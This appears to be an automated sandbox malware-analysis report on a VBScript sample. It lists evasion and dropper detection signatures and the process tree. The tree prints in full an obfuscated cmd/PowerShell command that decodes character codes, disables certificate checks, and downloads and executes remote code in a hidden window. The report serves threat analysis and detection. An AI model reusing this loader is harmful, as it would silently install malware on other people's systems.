Windows
Analysis Report
analysis.vbs
Overview
General Information
Detection
Score: | 84 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Joe Sandbox ML detected suspicious sample
Obfuscated command line found
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
wscript.exe (PID: 5608 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\analy sis.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) cmd.exe (PID: 320 cmdline:
"C:\Window s\System32 \cmd.exe" /C "echo $ ($BqIeP = $('{7}{8}{ 1}' -f $(' BxljcZKie' .ToCharArr ay())); $( (-290,-303 ,-280,-265 ,-335,-298 ,-280,-267 ,-263,-276 ,-282,-280 ,-301,-270 ,-276,-271 ,-265,-304 ,-284,-271 ,-284,-278 ,-280,-267 ,-288,-323 ,-323,-298 ,-280,-267 ,-263,-280 ,-267,-314 ,-280,-267 ,-265,-276 ,-279,-276 ,-282,-284 ,-265,-280 ,-295,-284 ,-273,-276 ,-281,-284 ,-265,-276 ,-270,-271 ,-314,-284 ,-273,-273 ,-283,-284 ,-282,-274 ,-349,-320 ,-349,-258 ,-345,-265 ,-267,-264 ,-280,-256 ,-322,-349 ,-345,-300 ,-315,-299 ,-307,-265 ,-278,-300 ,-298,-349 ,-320,-349 ,-290,-298 ,-260,-266 ,-265,-280 ,-272,-335 ,-303,-280 ,-265,-335 ,-309,-265 ,-265,-269 ,-294,-280 ,-283,-299 ,-280,-268 ,-264,-280 ,-266,-265 ,-288,-323 ,-323,-314 ,-267,-280 ,-284,-265 ,-280,-341 ,-342,-277 ,-265,-265 ,-269,-266 ,-323,-334 ,-334,-277 ,-270,-266 ,-265,-325 ,-328,-328 ,-333,-333 ,-335,-276 ,-271,-279 ,-270,-323 ,-332,-328 ,-330,-331 ,-331,-334 ,-262,-280 ,-283,-332 ,-335,-269 ,-277,-269 ,-342,-340 ,-322,-349 ,-345,-300 ,-315,-299 ,-307,-265 ,-278,-300 ,-298,-335 ,-297,-276 ,-272,-280 ,-270,-264 ,-265,-349 ,-320,-349 ,-330,-333 ,-333,-333 ,-333,-333 ,-322,-349 ,-345,-341 ,-290,-298 ,-260,-266 ,-265,-280 ,-272,-335 ,-308,-270 ,-335,-298 ,-265,-267 ,-280,-284 ,-272,-299 ,-280,-284 ,-281,-280 ,-267,-288 ,-341,-345 ,-300,-315 ,-299,-307 ,-265,-278 ,-300,-298 ,-335,-310 ,-280,-265 ,-299,-280 ,-266,-269 ,-270,-271 ,-266,-280 ,-341,-340 ,-335,-310 ,-280,-265 ,-299,-280 ,-266,-269 ,-270,-271 ,-266,-280 ,-298,-265 ,-267,-280 ,-284,-272 ,-341,-340 ,-340,-340 ,-335,-299 ,-280,-284 ,-281,-297 ,-270,-312 ,-271,-281 ,-341,-340 ,-349,-257 ,-349,-308 ,-312,-293 )^^^|%{[ch ar]($_+381 )})-join'' ) ^^^| ^^^ &($BqIeP) | C:\Windo ws\SysWOW6 4\WindowsP owerShell\ v1.0\power shell.exe -Window Hi dden -c -" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 6620 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 5780 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho $($BqIe P = $('{7} {8}{1}' -f $('BxljcZ Kie'.ToCha rArray())) ; $((-290, -303,-280, -265,-335, -298,-280, -267,-263, -276,-282, -280,-301, -270,-276, -271,-265, -304,-284, -271,-284, -278,-280, -267,-288, -323,-323, -298,-280, -267,-263, -280,-267, -314,-280, -267,-265, -276,-279, -276,-282, -284,-265, -280,-295, -284,-273, -276,-281, -284,-265, -276,-270, -271,-314, -284,-273, -273,-283, -284,-282, -274,-349, -320,-349, -258,-345, -265,-267, -264,-280, -256,-322, -349,-345, -300,-315, -299,-307, -265,-278, -300,-298, -349,-320, -349,-290, -298,-260, -266,-265, -280,-272, -335,-303, -280,-265, -335,-309, -265,-265, -269,-294, -280,-283, -299,-280, -268,-264, -280,-266, -265,-288, -323,-323, -314,-267, -280,-284, -265,-280, -341,-342, -277,-265, -265,-269, -266,-323, -334,-334, -277,-270, -266,-265, -325,-328, -328,-333, -333,-335, -276,-271, -279,-270, -323,-332, -328,-330, -331,-331, -334,-262, -280,-283, -332,-335, -269,-277, -269,-342, -340,-322, -349,-345, -300,-315, -299,-307, -265,-278, -300,-298, -335,-297, -276,-272, -280,-270, -264,-265, -349,-320, -349,-330, -333,-333, -333,-333, -333,-322, -349,-345, -341,-290, -298,-260, -266,-265, -280,-272, -335,-308, -270,-335, -298,-265, -267,-280, -284,-272, -299,-280, -284,-281, -280,-267, -288,-341, -345,-300, -315,-299, -307,-265, -278,-300, -298,-335, -310,-280, -265,-299, -280,-266, -269,-270, -271,-266, -280,-341, -340,-335, -310,-280, -265,-299, -280,-266, -269,-270, -271,-266, -280,-298, -265,-267, -280,-284, -272,-341, -340,-340, -340,-335, -299,-280, -284,-281, -297,-270, -312,-271, -281,-341, -340,-349, -257,-349, -308,-312, -293)^|%{[ char]($_+3 81)})-join '') ^| ^&( $BqIeP) " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) powershell.exe (PID: 6464 cmdline:
C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe -W indow Hidd en -c - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |
---|
Source: | Author: frack113, Florian Roth: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |